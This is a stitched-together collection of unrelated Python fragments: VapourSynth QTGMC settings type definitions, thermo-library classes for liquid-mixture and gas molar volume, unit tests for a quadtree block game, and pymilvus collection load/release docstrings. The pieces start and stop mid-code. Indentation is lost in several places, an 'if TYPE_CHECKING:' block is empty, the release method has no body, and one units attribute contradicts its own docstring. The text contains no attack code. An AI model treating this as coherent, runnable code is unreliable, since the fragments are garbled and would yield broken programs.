'Settings',
'SearchPre', 'SubPel', 'SubPelInter', 'Search', 'PLevel',
'InputType'
]
from enum import IntEnum
from typing import TYPE_CHECKING, Any, Dict, Optional, TypedDict
from ._abstract import LoggedSettings
if TYPE_CHECKING:
# Features / Settings dicts
class VSCallableD(TypedDict):
    """
    VapourSynth Callable Deinterlacer.\n
    Must map a Deinterlacer.
    """
    name: str
    """
    Deinterlacer name. Must map a name in /filers/_conv/DEINTERLACERS
    """
    args: Optional[Dict[str, Any]]
    """
    Additional keyword arguments (presumably forwarded to the deinterlacer
    call -- confirm in /filers/_conv).
    """
class CoreParam(TypedDict):
    """
    Couple of Temporal Radius and Repair values.
    """
    tr: int
    """
    Temporal binomial/linear smoothing radius used.
    """
    rep: int
    """
    Repair value (0=off).
    """
class CoreSettings(TypedDict):
    """
    Main core settings for motion analysis.
    """
    motion_search: CoreParam
    """
    Made of a temporal binomial smoothing radius used to create motion search clip
    and a repair motion search value.\n
    Old "TR0" and "Rep0".
    """
    initial_output: CoreParam
    """
    Made of a temporal binomial smoothing radius used on interpolated clip
    for initial output and a repair initial output value.\n
    Old "TR1" and "Rep1".
    """
    final_output: CoreParam
    """
    Made of a temporal linear smoothing radius used
    for final stabilization / denoising and a repair final output value.\n
    Old "TR2" and "Rep2".
    """
class InterpolationSettings(TypedDict):
    """
    Interpolation settings.
    """
    deint: VSCallableD
    """
    Main deinterlacer.\n
    Supported string names are in /filers/_conv/DEINTERLACERS.
    Old "EdiMode" ("NNSize", "NNeurons", "EdiQual", "EdiMaxD", "EdiThreads").
    """
    deint_chroma: Optional[VSCallableD]
    """
    Optional deinterlacer for chroma planes.\n
    Supported string names are in /filers/_conv/DEINTERLACERS.
    Old "ChromaEdi".
    """
    ref: Optional[bool]
    """
    Boolean used to check if a reference clip has been passed to the main class QTGMC.
    Old "EdiExt", kinda.
    """
class MotionAnalysisSettings(TypedDict):
    """
    Motion analysis settings used in mvtools.
    """
    searchpre: int
    """
    Pre-filtering for motion search clip. See `SearchPre`.
    Old "SrchClipPP".
    """
    subpel: int
    """
    Sub-pixel accuracy for motion analysis. See `SubPel`.
    Old "SubPel".
    """
    subpel_inter: int
    """
    Interpolation used for sub-pixel motion analysis. See `SubPelInter`.
    Old "SubPelInterp".
    """
    blocksize: int
    """
    Size of blocks that are matched during motion analysis.
    Old "Blocksize".
    """
    overlap: int
    """
    How much to overlap motion analysis blocks
    (requires more blocks, but essential to smooth block edges in motion compensation).
    Old "Overlap".
    """
    search: int
    """
    Search method used for matching motion blocks - see MVTools2 documentation for available algorithms.
    See `Search`.
    Old "Search".
    """
    search_param: int
    """
    Parameter for search method chosen. See `Search`.
    Old "SearchParam".
    """
    pelsearch: int
    """
    Search parameter (as above) for the finest sub-pixel level. See `SubPel`.
    Old "PelSearch".
    """
    chroma_motion: bool
    """
    Whether to consider chroma when analyzing motion.
    Setting to false gives good speed-up, but may very occasionally make incorrect motion decision.
    Old "ChromaMotion".
    """
    truemotion: bool
    """
    Whether to use the 'truemotion' defaults from MAnalyse.
    Old "TrueMotion".
    """
    lambda_: Optional[int]
    """
    Motion vector field coherence - how much the motion analysis favors similar motion vectors
    for neighboring blocks. Should be scaled by blocksize * blocksize / 64.
    Old "Lambda".
    """
    lsad: Optional[int]
    """
    How much to reduce need for vector coherence (i.e. lambda_ above) if prediction of motion vector
    from neighbors is poor, typically in areas of complex motion.
    This value is scaled in MVTools (unlike lambda_).
    Old "LSAD".
    """
    pnew: Optional[int]
    """
    Penalty for choosing a new motion vector for a block over an existing one -
    avoids choosing new vectors for minor gain.
    Old "PNew".
    """
    plevel: Optional[int]
    """
    Mode for scaling lambda across different sub-pixel levels - see MVTools2 documentation for choices.
    See `PLevel`.
    Old "PLevel".
    """
    globalmotion: bool
    """
    Whether to estimate camera motion to assist in selecting block motion vectors.
    Old "GlobalMotion".
    """
    dct: int
    """
    Modes to use DCT (frequency analysis) or SATD as part of the block matching process -
    see MVTools2 documentation for choices.
    Old "DCT".
    """
    thsad_initial_output: int
    """
    SAD threshold for block match on shimmer-removing temporal smooth (initial_output tr).
    Increase to reduce bob-shimmer more (may smear/blur).
    Old "ThSAD1".
    """
    thsad_final_output: int
    """
    SAD threshold for block match on final denoising temporal smooth (final_output tr).
    Increase to strengthen final smooth (may smear/blur).
    Old "ThSAD2".
    """
    thscd1: int
    """
    Scene change detection parameter 1 - see MVTools documentation.
    Old "ThSCD1".
    """
    thscd2: int
    """
    Scene change detection parameter 2 - see MVTools documentation.
    Old "ThSCD2".
    """
    prog_sad_mask: float
    """
    Only applies to InputType=2 or 3.
    If prog_sad_mask > 0.0 then blend InputType modes 1 and 2/3 based on block motion SAD.
    Higher values help recover more detail, but repair less artefacts.
    Reasonable range about 2.0 to 20.0, or 0.0 for no blending.
    Old "ProgSADMask".
    """
class SharpnessSettings(TypedDict):
    """
    Sharpness (resharpening) settings.
    """
    strength: float
    """
    How much to resharpen the temporally blurred clip.
    Old "Sharpness".
    """
    mode: int
    """
    Resharpening mode. See `SharpnessMode`.
    Old "SMode".
    """
    lmode: int
    """
    Sharpness limiting. See `SharpnessLimitMode`.
    Old "SLMode".
    """
    lrad: int
    """
    Temporal or spatial radius used with sharpness limiting (depends on SLMode).
    Temporal radius can only be 0, 1 or 3.
    Old "SLRad".
    """
    ovs: int
    """
    Amount of overshoot allowed with temporal sharpness limiting (SLMode = 2,4),
    i.e. allow some oversharpening.
    Old "SOvs".
    """
    vthin: float
    """
    How much to thin down 1-pixel wide lines that have been widened due to interpolation
    into neighboring field lines.
    Old "SVThin".
    """
    bb: int
    """
    Back blend (blurred) difference between pre & post sharpened clip (minor fidelity improvement).
    See `SharpnessBackBlend`.
    Old "Sbb".
    """
class SourceMatchSettings(TypedDict):
    """
    Source-match settings (recovering detail from the original source).
    """
    match: int
    """
    Match mode, see `MatchMode`.
    Old "SourceMatch".
    """
    lossless: int
    """
    Adds some extra detail but:
    mode 1 gets shimmer / minor combing,
    mode 2 is more stable/tweakable but not exactly lossless.
    Old "Lossless".
    """
    basic_deint: VSCallableD
    """
    Override default interpolation method for basic source-match.
    Old "MatchEdi", kinda.
    """
    refined_deint: VSCallableD
    """
    Override interpolation method for refined source-match.
    Can be a good idea to pick MatchEdi2="Bob" for speed.
    Old "MatchEdi2", kinda.
    """
    refined_tr: int
    """
    Temporal radius for refined source-matching.
    Basic source-match doesn't need this setting as its temporal radius must match initial_output tr.
    2=smoothness, 1=speed/sharper, 0=not recommended. Differences are very marginal.
    Old "MatchTR2".
    """
    enhance: float
    """
    Enhance the detail found by source-match modes 2 & 3.
    A slight cheat - will enhance noise if set too strong.
    Best set < 1.0.
    Old "MatchEnhance".
    """
class NoiseSettings(TypedDict):
    """
    Noise bypass / grain handling settings.
    """
    mode: int
    """
    Bypass mode:
    0 = disable,
    1 = denoise source & optionally restore some noise back at end of script [use for stronger denoising],
    2 = identify noise only & optionally restore some after QTGMC smoothing [for grain retention / light denoising].
    Old "NoiseProcess".
    """
    denoiser: VSCallableD
    """
    Select denoiser to use for noise bypass / denoising.
    Old "Denoiser".
    """
    use_mc: bool
    """
    Whether to provide a motion-compensated clip to the denoiser
    for better noise vs detail detection (will be a little slower).
    Old "DenoiseMC".
    """
    tr: int
    """
    Temporal radius used when analyzing clip for noise extraction.
    Higher values better identify noise vs detail but are slower.
    Old "NoiseTR".
    """
    strength: float
    """
    Amount of noise known to be in the source, sensible values vary by source and denoiser, so experiment.
    Old "Sigma".
    """
    chroma: bool
    """
    Whether to process chroma noise or not.
    Old "ChromaNoise".
    """
    restore_before_final: float
    """
    How much removed noise/grain to restore before final temporal smooth.
    Retain "stable" grain and some detail (effect depends on final_output tr).
    Old "GrainRestore".
    """
    restore_after_final: float
    """
    How much removed noise/grain to restore after final temporal smooth.
    Retains any kind of noise.
    Old "NoiseRestore".
    """
    deint: VSCallableD
    """
    When noise is taken from interlaced source, how to 'deinterlace' it before restoring.
    Old "NoiseDeint".
    """
    stabilise: bool
    """
    Use motion compensation to limit shimmering and strengthen detail within the restored noise.
    Old "StabilizeNoise".
    """
class MotionBlurSettings(TypedDict):
"""
By default QTGMC outputs video at "double-rate", twice the frame rate of the source.
This is because there are two separate images | |
reset the parameters.
'''
methods = [SIMPLE]
if none_and_length_check([self.Tcs, self.Vcs, self.omegas, self.CASs]):
methods.append(COSTALD_MIXTURE)
if all([i in COSTALD_data.index for i in self.CASs]):
self.COSTALD_Vchars = [COSTALD_data.at[CAS, 'Vchar'] for CAS in self.CASs]
self.COSTALD_omegas = [COSTALD_data.at[CAS, 'omega_SRK'] for CAS in self.CASs]
methods.append(COSTALD_MIXTURE_FIT)
if none_and_length_check([self.MWs, self.Tcs, self.Pcs, self.Zcs, self.CASs]):
methods.append(RACKETT)
if all([CAS in COSTALD_data.index for CAS in self.CASs]):
Z_RAs = [COSTALD_data.at[CAS, 'Z_RA'] for CAS in self.CASs]
if not any(np.isnan(Z_RAs)):
self.Z_RAs = Z_RAs
methods.append(RACKETT_PARAMETERS)
if len(self.CASs) > 1 and '7732-18-5' in self.CASs:
wCASs = [i for i in self.CASs if i != '7732-18-5']
if all([i in _Laliberte_Density_ParametersDict for i in wCASs]):
methods.append(LALIBERTE)
self.wCASs = wCASs
self.index_w = self.CASs.index('7732-18-5')
self.all_methods = set(methods)
def calculate(self, T, P, zs, ws, method):
r'''Method to calculate molar volume of a liquid mixture at
temperature `T`, pressure `P`, mole fractions `zs` and weight fractions
`ws` with a given method.
This method has no exception handling; see `mixture_property`
for that.
Parameters
----------
T : float
Temperature at which to calculate the property, [K]
P : float
Pressure at which to calculate the property, [Pa]
zs : list[float]
Mole fractions of all species in the mixture, [-]
ws : list[float]
Weight fractions of all species in the mixture, [-]
method : str
Name of the method to use
Returns
-------
Vm : float
Molar volume of the liquid mixture at the given conditions,
[m^3/mol]
'''
if method == SIMPLE:
Vms = [i(T, P) for i in self.VolumeLiquids]
return Amgat(zs, Vms)
elif method == COSTALD_MIXTURE:
return COSTALD_mixture(zs, T, self.Tcs, self.Vcs, self.omegas)
elif method == COSTALD_MIXTURE_FIT:
return COSTALD_mixture(zs, T, self.Tcs, self.COSTALD_Vchars, self.COSTALD_omegas)
elif method == RACKETT:
return Rackett_mixture(T, zs, self.MWs, self.Tcs, self.Pcs, self.Zcs)
elif method == RACKETT_PARAMETERS:
return Rackett_mixture(T, zs, self.MWs, self.Tcs, self.Pcs, self.Z_RAs)
elif method == LALIBERTE:
ws = list(ws) ; ws.pop(self.index_w)
rho = Laliberte_density(T, ws, self.wCASs)
MW = mixing_simple(zs, self.MWs)
return rho_to_Vm(rho, MW)
else:
raise Exception('Method not valid')
def test_method_validity(self, T, P, zs, ws, method):
r'''Method to test the validity of a specified method for the given
conditions. No methods have implemented checks or strict ranges of
validity.
Parameters
----------
T : float
Temperature at which to check method validity, [K]
P : float
Pressure at which to check method validity, [Pa]
zs : list[float]
Mole fractions of all species in the mixture, [-]
ws : list[float]
Weight fractions of all species in the mixture, [-]
method : str
Method name to use
Returns
-------
validity : bool
Whether or not a specifid method is valid
'''
if LALIBERTE in self.all_methods:
# If everything is an electrolyte, accept only it as a method
if method in self.all_methods:
return method == LALIBERTE
if method in self.all_methods:
return True
else:
raise Exception('Method not valid')
### Gases
def ideal_gas(T, P):
    r'''Calculate the molar volume of an ideal gas.

    The ideal gas law gives:

    .. math::
        V = \frac{RT}{P}

    Parameters
    ----------
    T : float
        Temperature of fluid [K]
    P : float
        Pressure of fluid [Pa]

    Returns
    -------
    V : float
        Gas volume, [m^3/mol]

    Examples
    --------
    >>> ideal_gas(298.15, 101325.)
    0.02446539540458919
    '''
    return T*R/P
# Method-name constants for the gas molar volume correlations.
#PR = 'PR'
CRC_VIRIAL = 'CRC_VIRIAL'
TSONOPOULOS_EXTENDED = 'TSONOPOULOS_EXTENDED'
TSONOPOULOS = 'TSONOPOULOS'
ABBOTT = 'ABBOTT'
PITZER_CURL = 'PITZER_CURL'
IDEAL = 'IDEAL'
NONE = 'NONE'
# COOLPROP and EOS are defined elsewhere in this module.
volume_gas_methods = [COOLPROP, EOS, CRC_VIRIAL, TSONOPOULOS_EXTENDED, TSONOPOULOS,
                      ABBOTT, PITZER_CURL, IDEAL]
'''Holds all methods available for the VolumeGas class, for use in
iterating over them.'''
class VolumeGas(TPDependentProperty):
r'''Class for dealing with gas molar volume as a function of
temperature and pressure.
All considered methods are both temperature and pressure dependent. Included
are four CSP methods for calculating second virial coefficients, one
source of polynomials for calculating second virial coefficients, one
equation of state (Peng-Robinson), and the ideal gas law.
Parameters
----------
CASRN : str, optional
The CAS number of the chemical
MW : float, optional
Molecular weight, [g/mol]
Tc : float, optional
Critical temperature, [K]
Pc : float, optional
Critical pressure, [Pa]
omega : float, optional
Acentric factor, [-]
dipole : float, optional
Dipole, [debye]
Notes
-----
A string holding each method's name is assigned to the following variables
in this module, intended as the most convenient way to refer to a method.
To iterate over all methods, use the list stored in
:obj:`volume_gas_methods`.
**PR**:
Peng-Robinson Equation of State. See the appropriate module for more
information.
**CRC_VIRIAL**:
Short polynomials, for 105 fluids from [1]_. The full expression is:
.. math::
B = \sum_1^4 a_i\left[T_0/298.15-1\right]^{i-1}
**TSONOPOULOS_EXTENDED**:
CSP method for second virial coefficients, described in
:obj:`thermo.virial.BVirial_Tsonopoulos_extended`
**TSONOPOULOS**:
CSP method for second virial coefficients, described in
:obj:`thermo.virial.BVirial_Tsonopoulos`
**ABBOTT**:
CSP method for second virial coefficients, described in
:obj:`thermo.virial.BVirial_Abbott`. This method is the simplest CSP
method implemented.
**PITZER_CURL**:
CSP method for second virial coefficients, described in
:obj:`thermo.virial.BVirial_Pitzer_Curl`.
**COOLPROP**:
CoolProp external library; with select fluids from its library.
Range is limited to that of the equations of state it uses, as
described in [2]_. Very slow, but unparalled in accuracy for pressure
dependence.
See Also
--------
:obj:`thermo.virial.BVirial_Pitzer_Curl`
:obj:`thermo.virial.BVirial_Abbott`
:obj:`thermo.virial.BVirial_Tsonopoulos`
:obj:`thermo.virial.BVirial_Tsonopoulos_extended`
References
----------
.. [1] <NAME>., <NAME>, and <NAME>. CRC Handbook of
Chemistry and Physics. [Boca Raton, FL]: CRC press, 2014.
.. [2] Bell, <NAME>., <NAME>, <NAME>, and <NAME>.
"Pure and Pseudo-Pure Fluid Thermophysical Property Evaluation and the
Open-Source Thermophysical Property Library CoolProp." Industrial &
Engineering Chemistry Research 53, no. 6 (February 12, 2014):
2498-2508. doi:10.1021/ie4033999. http://www.coolprop.org/
'''
name = 'Gas molar volume'
units = 'mol/m^3'
interpolation_T = None
'''No interpolation transformation by default.'''
interpolation_P = None
'''No interpolation transformation by default.'''
interpolation_property = None
'''No interpolation transformation by default.'''
interpolation_property_inv = None
'''No interpolation transformation by default.'''
tabular_extrapolation_permitted = True
'''Allow tabular extrapolation by default.'''
property_min = 0
'''Mimimum valid value of gas molar volume. It should normally be well
above this.'''
property_max = 1E10
'''Maximum valid value of gas molar volume. Set roughly at an ideal gas
at 1 Pa and 2 billion K.'''
Pmax = 1E9 # 1 GPa
'''Maximum pressure at which no method can calculate gas molar volume
above.'''
Pmin = 0
'''Minimum pressure at which no method can calculate gas molar volume
under.'''
ranked_methods = []
'''Default rankings of the low-pressure methods.'''
ranked_methods_P = [COOLPROP, EOS, TSONOPOULOS_EXTENDED, TSONOPOULOS, ABBOTT,
PITZER_CURL, CRC_VIRIAL, IDEAL]
'''Default rankings of the pressure-dependent methods.'''
def __init__(self, CASRN='', MW=None, Tc=None, Pc=None, omega=None,
dipole=None, eos=None):
# Only use TPDependentPropoerty functions here
self.CASRN = CASRN
self.MW = MW
self.Tc = Tc
self.Pc = Pc
self.omega = omega
self.dipole = dipole
self.eos = eos
self.Tmin = 0
'''Minimum temperature at which no method can calculate the
gas molar volume under.'''
self.Tmax = 2E9
'''Maximum temperature at which no method can calculate the
gas molar volume above.'''
self.tabular_data = {}
'''tabular_data, dict: Stored (Ts, properties) for any
tabular data; indexed by provided or autogenerated name.'''
self.tabular_data_interpolators = {}
self.tabular_data_interpolators = {}
'''tabular_data_interpolators, dict: Stored (extrapolator,
spline) tuples which are interp1d instances for each set of tabular
data; indexed by tuple of (name, interpolation_T,
interpolation_property, interpolation_property_inv) to ensure that
if an interpolation transform is altered, the old interpolator which
had been created is no longer used.'''
self.tabular_data_P = {}
'''tabular_data_P, dict: Stored (Ts, Ps, properties) for any
tabular data; indexed by provided or autogenerated name.'''
self.tabular_data_interpolators_P = {}
'''tabular_data_interpolators_P, dict: Stored (extrapolator,
spline) tuples which are interp2d instances for each set of tabular
data; indexed by tuple of (name, interpolation_T, interpolation_P,
interpolation_property, interpolation_property_inv) to ensure that
if an interpolation transform is altered, the old interpolator which
had been created is no longer used.'''
self.sorted_valid_methods_P = []
'''sorted_valid_methods_P, list: Stored methods which were found valid
at a specific temperature; set by `TP_dependent_property`.'''
self.user_methods_P = []
'''user_methods_P, list: Stored methods which were specified by the user
in a ranked order of preference; set by `TP_dependent_property`.'''
self.all_methods_P = set()
'''Set of all high-pressure methods available for a given CASRN and
properties; filled by :obj:`load_all_methods`.'''
self.load_all_methods()
def load_all_methods(self):
r'''Method which picks out coefficients for the specified chemical
from the various dictionaries and DataFrames | |
0
board = Block((0, 0), 1000, None, 0, 2)
# Level 1
colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
set_children(board, colours)
# Level 2
colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
set_children(board.children[1], colours1)
colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
set_children(board.children[3], colours2)
block_squares = _block_to_squares(board)
assert len(block_squares) == 10
assert (COLOUR_LIST[3], (500, 0), 500) in block_squares
assert (COLOUR_LIST[1], (250, 0), 250) in block_squares
assert (COLOUR_LIST[2], (0, 0), 250) in block_squares
assert (COLOUR_LIST[0], (0, 250), 250) in block_squares
assert (COLOUR_LIST[2], (250, 250), 250) in block_squares
assert (COLOUR_LIST[0], (0, 500), 500) in block_squares
assert (COLOUR_LIST[0], (750, 500), 250) in block_squares
assert (COLOUR_LIST[1], (500, 500), 250) in block_squares
assert (COLOUR_LIST[3], (500, 750), 250) in block_squares
assert (COLOUR_LIST[2], (750, 750), 250) in block_squares
# TODO: ~~~~~~ TASK 3 ~~~~~~ ~~~~~~ TASK 3 ~~~~~~ ~~~~~~ TASK 3 ~~~~~~
def test_generate_goals_15() -> None:
    """Two generated goals share one goal type and use distinct colours."""
    goals = generate_goals(2)
    unused_colours = COLOUR_LIST.copy()
    assert len(goals) == 2
    for goal_type in (PerimeterGoal, BlobGoal):
        if isinstance(goals[0], goal_type):
            for g in goals:
                assert isinstance(g, goal_type)
                assert g.colour in unused_colours
                unused_colours.remove(g.colour)
def test_generate_goals_16() -> None:
    """Requesting zero goals yields an empty list."""
    goals = generate_goals(0)
    assert goals == []
    assert len(goals) == 0
def test_generate_goals_17() -> None:
    """Four generated goals share one type and exhaust all four colours."""
    goals = generate_goals(4)
    unused_colours = COLOUR_LIST.copy()
    assert len(goals) == 4
    for goal_type in (PerimeterGoal, BlobGoal):
        if isinstance(goals[0], goal_type):
            for g in goals:
                assert isinstance(g, goal_type)
                assert g.colour in unused_colours
                unused_colours.remove(g.colour)
            assert len(unused_colours) == 0
def test_generate_goals_18() -> None:
    """generate_goals(3) produces three same-type goals with distinct colours,
    leaving exactly one colour unused."""
    goals = generate_goals(3)
    unused = COLOUR_LIST.copy()
    assert len(goals) == 3
    for goal_type in (PerimeterGoal, BlobGoal):
        if isinstance(goals[0], goal_type):
            for g in goals:
                assert isinstance(g, goal_type)
                assert g.colour in unused
                unused.remove(g.colour)
            assert len(unused) == 1
def test_generate_goals_19() -> None:
    """generate_goals(1) produces a single goal whose colour comes from
    COLOUR_LIST, leaving three colours unused."""
    goals = generate_goals(1)
    unused = COLOUR_LIST.copy()
    assert len(goals) == 1
    for goal_type in (PerimeterGoal, BlobGoal):
        if isinstance(goals[0], goal_type):
            for g in goals:
                assert isinstance(g, goal_type)
                assert g.colour in unused
                unused.remove(g.colour)
            assert len(unused) == 3
# TODO: ~~~~~~ TASK 4 ~~~~~~ ~~~~~~ TASK 4 ~~~~~~ ~~~~~~ TASK 4 ~~~~~~
def test_get_block_20() -> None:
    """_get_block on a 750-unit board with max_depth 3.

    Checks exact resolution at levels 0-2 and that asking for a level
    deeper than the actual subdivision returns the deepest existing block.
    Points with x == 750 or y == 750 lie on the exclusive right/bottom
    edge and must resolve to None.
    """
    # Level 0
    board = Block((0, 0), 750, None, 0, 3)
    # Level 1: top-right child (children[0]) is left unfilled so it can be
    # subdivided further below.
    colours1 = [None, COLOUR_LIST[2], COLOUR_LIST[1], COLOUR_LIST[3]]
    set_children(board, colours1)
    # Level 2
    colours2 = [COLOUR_LIST[1], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[0]]
    set_children(board.children[0], colours2)
    # level 3
    # testings at level 0: any in-bounds point is the board itself.
    assert _get_block(board, (0, 0), 0) == board
    assert _get_block(board, (4, 94), 0) == board
    assert _get_block(board, (9343, 32), 0) is None
    assert _get_block(board, (750, 32), 0) is None
    assert _get_block(board, (750, 0), 0) is None
    assert _get_block(board, (750, 750), 0) is None
    assert _get_block(board, (0, 750), 0) is None
    # testings at level 1: quadrant boundaries fall at x,y == 375.
    assert _get_block(board, (0, 0), 1) == board.children[1]
    assert _get_block(board, (4, 94), 1) == board.children[1]
    assert _get_block(board, (321, 94), 1) == board.children[1]
    assert _get_block(board, (375, 94), 1) == board.children[0]
    assert _get_block(board, (375, 375), 1) == board.children[3]
    assert _get_block(board, (750, 750), 1) is None
    assert _get_block(board, (400, 750), 1) is None
    assert _get_block(board, (400, 300), 1) == board.children[0]
    assert _get_block(board, (833, 0), 1) is None
    assert _get_block(board, (500, 400), 1) == board.children[3]
    # testings at level 2: only children[0] has level-2 descendants; points
    # in other quadrants resolve to their level-1 leaf.
    assert _get_block(board, (0, 0), 2) == board.children[1]
    assert _get_block(board, (4, 94), 2) == board.children[1]
    # assert _get_block(board, (375, 375), 2) == board.children[3] # TODO: THIS ASSERTION FAILED
    assert _get_block(board, (375, 25), 2) == board.children[0].children[1]
    assert _get_block(board, (375, 205), 2) == board.children[0].children[2]
    assert _get_block(board, (375, 83), 2) == board.children[0].children[1]
    assert _get_block(board, (375, 299), 2) == board.children[0].children[2]
    assert _get_block(board, (400, 299), 2) == board.children[0].children[2]
    assert _get_block(board, (600, 299), 2) == board.children[0].children[3]
    assert _get_block(board, (600, 30), 2) == board.children[0].children[0]
    assert _get_block(board, (600, 188), 2) == board.children[0].children[3]
    assert _get_block(board, (563, 188), 2) == board.children[0].children[3]
    assert _get_block(board, (563, 187), 2) == board.children[0].children[0]
    assert _get_block(board, (600, 0), 2) == board.children[0].children[0]
    assert _get_block(board, (943, 0), 2) is None
    # above level 2: levels beyond the tree depth clamp to the deepest block.
    assert _get_block(board, (0, 0), 3) == board.children[1]
    assert _get_block(board, (0, 0), 4) == board.children[1]
    assert _get_block(board, (375, 25), 3) == board.children[0].children[1]
    assert _get_block(board, (375, 205), 4) == board.children[0].children[2]
    assert _get_block(board, (375, 83), 3) == board.children[0].children[1]
    assert _get_block(board, (375, 299), 4) == board.children[0].children[2]
    assert _get_block(board, (400, 299), 5) == board.children[0].children[2]
    assert _get_block(board, (600, 299), 3) == board.children[0].children[3]
    assert _get_block(board, (600, 30), 4) == board.children[0].children[0]
    assert _get_block(board, (600, 188), 3) == board.children[0].children[3]
def test_get_block_21() -> None:
    """_get_block on an undivided leaf board: every in-bounds point resolves
    to the board itself at any level; out-of-bounds points resolve to None.

    x == 750 or y == 750 is on the exclusive right/bottom edge, hence
    out of bounds for a 750-unit board anchored at (0, 0).
    """
    # level 0
    board = Block((0, 0), 750, COLOUR_LIST[1], 0, 1)
    inside = [(0, 0), (321, 34), (84, 34), (184, 303), (4, 303), (43, 33)]
    outside = [(9, 3421), (750, 0), (0, 750), (92, 750), (750, 750), (750, 93)]
    # testings at level 0
    for point in inside:
        assert _get_block(board, point, 0) == board
    for point in outside:
        assert _get_block(board, point, 0) is None
    # above level 0: the board has no children, so deeper levels clamp to it.
    deep_hits = [((0, 0), 1), ((321, 34), 2), ((84, 34), 1),
                 ((184, 303), 2), ((4, 303), 1), ((43, 33), 3)]
    deep_misses = [((9, 3421), 5), ((750, 0), 1), ((0, 750), 2),
                   ((92, 750), 1), ((750, 750), 1), ((750, 93), 1)]
    for point, level in deep_hits:
        assert _get_block(board, point, level) == board
    for point, level in deep_misses:
        assert _get_block(board, point, level) is None
def test_get_block_22() -> None:
    """_get_block on a 750-unit board with max_depth 2 where only the
    upper-left (children[1]) and lower-right (children[3]) quadrants are
    subdivided.

    Points inside the undivided quadrants must resolve to the level-1
    leaf even when a deeper level is requested.
    """
    # Level 0
    board = Block((0, 0), 750, None, 0, 2)
    # Level 1: children[1] and children[3] left as None so they can be split.
    colours = [COLOUR_LIST[3], None, COLOUR_LIST[0], None]
    set_children(board, colours)
    # Level 2
    colours1 = [COLOUR_LIST[1], COLOUR_LIST[2], COLOUR_LIST[0], COLOUR_LIST[2]]
    set_children(board.children[1], colours1)
    colours2 = [COLOUR_LIST[0], COLOUR_LIST[1], COLOUR_LIST[3], COLOUR_LIST[2]]
    set_children(board.children[3], colours2)
    # testing at level 0: every in-bounds point is the board itself.
    assert _get_block(board, (1, 2), 0) == board
    assert _get_block(board, (10, 22), 0) == board
    assert _get_block(board, (10, 22), 0) == board
    assert _get_block(board, (150, 22), 0) == board
    assert _get_block(board, (250, 22), 0) == board
    assert _get_block(board, (250, 220), 0) == board
    assert _get_block(board, (163, 220), 0) == board
    assert _get_block(board, (278, 89), 0) == board
    assert _get_block(board, (500, 300), 0) == board
    assert _get_block(board, (600, 300), 0) == board
    assert _get_block(board, (520, 699), 0) == board
    assert _get_block(board, (600, 700), 0) == board
    assert _get_block(board, (500, 700), 0) == board
    assert _get_block(board, (278, 300), 0) == board
    # testing at level 1: quadrant boundaries fall at x,y == 375.
    assert _get_block(board, (500, 30), 1) == board.children[0]
    assert _get_block(board, (10, 22), 1) == board.children[1]
    assert _get_block(board, (10, 22), 1) == board.children[1]
    assert _get_block(board, (150, 22), 1) == board.children[1]
    assert _get_block(board, (250, 22), 1) == board.children[1]
    assert _get_block(board, (500, 300), 1) == board.children[0]
    assert _get_block(board, (600, 375), 1) == board.children[3]
    assert _get_block(board, (520, 699), 1) == board.children[3]
    assert _get_block(board, (600, 700), 1) == board.children[3]
    assert _get_block(board, (500, 700), 1) == board.children[3]
    # testing at level 2: children[0] and children[2] are leaves, so their
    # points still resolve to the level-1 block.
    assert _get_block(board, (1, 2), 2) == board.children[1].children[1]
    assert _get_block(board, (10, 22), 2) == board.children[1].children[1]
    assert _get_block(board, (10, 22), 2) == board.children[1].children[1]
    assert _get_block(board, (150, 22), 2) == board.children[1].children[1]
    assert _get_block(board, (250, 22), 2) == board.children[1].children[0]
    assert _get_block(board, (250, 220), 2) == board.children[1].children[3]
    assert _get_block(board, (163, 220), 2) == board.children[1].children[2]
    assert _get_block(board, (278, 89), 2) == board.children[1].children[0]
    assert _get_block(board, (278, 300), 2) == board.children[1].children[3]
    assert _get_block(board, (500, 300), 2) == board.children[0]
    assert _get_block(board, (600, 300), 2) == board.children[0]
    assert _get_block(board, (520, 699), 2) == board.children[3].children[2]
    assert _get_block(board, (499, 699), 2) == board.children[3].children[2]
    assert _get_block(board, (60, 700), 2) == board.children[2]
    assert _get_block(board, (600, 700), 2) == board.children[3].children[3]
    assert _get_block(board, (10, 700), 2) == board.children[2]
    assert _get_block(board, (500, 700), 2) == board.children[3].children[2]
    assert _get_block(board, (563, 7), 2) == board.children[0]
# TODO: ~~~~~~ TASK 5 ~~~~~~ ~~~~~~ TASK 5 ~~~~~~ ~~~~~~ TASK 5 ~~~~~~
def test_update_child_pos_23() -> None:
# Level 0
board = Block((0, 0), | |
* *_async* (``bool``) --
Indicate if invoke asynchronously.
:raises CollectionNotExistException: If the collection does not exist.
:raises ParamError: If the parameters are invalid.
:raises BaseException: If the specified field, index or partition does not exist.
:example:
>>> from pymilvus import connections, Collection, FieldSchema, CollectionSchema, DataType
>>> connections.connect()
>>> schema = CollectionSchema([
... FieldSchema("film_id", DataType.INT64, is_primary=True),
... FieldSchema("films", dtype=DataType.FLOAT_VECTOR, dim=2)
... ])
>>> collection = Collection("test_collection_load", schema)
>>> collection.insert([[1, 2], [[1.0, 2.0], [3.0, 4.0]]])
<pymilvus.search.MutationResult object at 0x7fabaf3e5d50>
>>> collection.load()
>>> collection.num_entities
2
"""
conn = self._get_connection()
if partition_names is not None:
conn.load_partitions(self._name, partition_names, timeout=timeout, **kwargs)
else:
conn.load_collection(self._name, timeout=timeout, **kwargs)
def release(self, timeout=None, **kwargs):
    """Release the collection from memory.

    :param timeout:
        * *timeout* (``float``) --
          An optional duration of time in seconds to allow for the RPC. If timeout
          is set to None, the client keeps waiting until the server responds or an
          error occurs.
    :raises CollectionNotExistException: If collection does not exist.
    :raises BaseException: If collection has not been loaded to memory.

    :example:
        >>> from pymilvus import connections, Collection, FieldSchema, CollectionSchema, DataType
        >>> connections.connect()
        >>> schema = CollectionSchema([
        ...     FieldSchema("film_id", DataType.INT64, is_primary=True),
        ...     FieldSchema("films", dtype=DataType.FLOAT_VECTOR, dim=2)
        ... ])
        >>> collection = Collection("test_collection_release", schema)
        >>> collection.insert([[1, 2], [[1.0, 2.0], [3.0, 4.0]]])
        <pymilvus.search.MutationResult object at 0x7fabaf3e5d50>
        >>> collection.load()
        >>> collection.num_entities
        2
        >>> collection.release()  # release the collection from memory
    """
    # Delegate straight to the underlying gRPC handler for this collection.
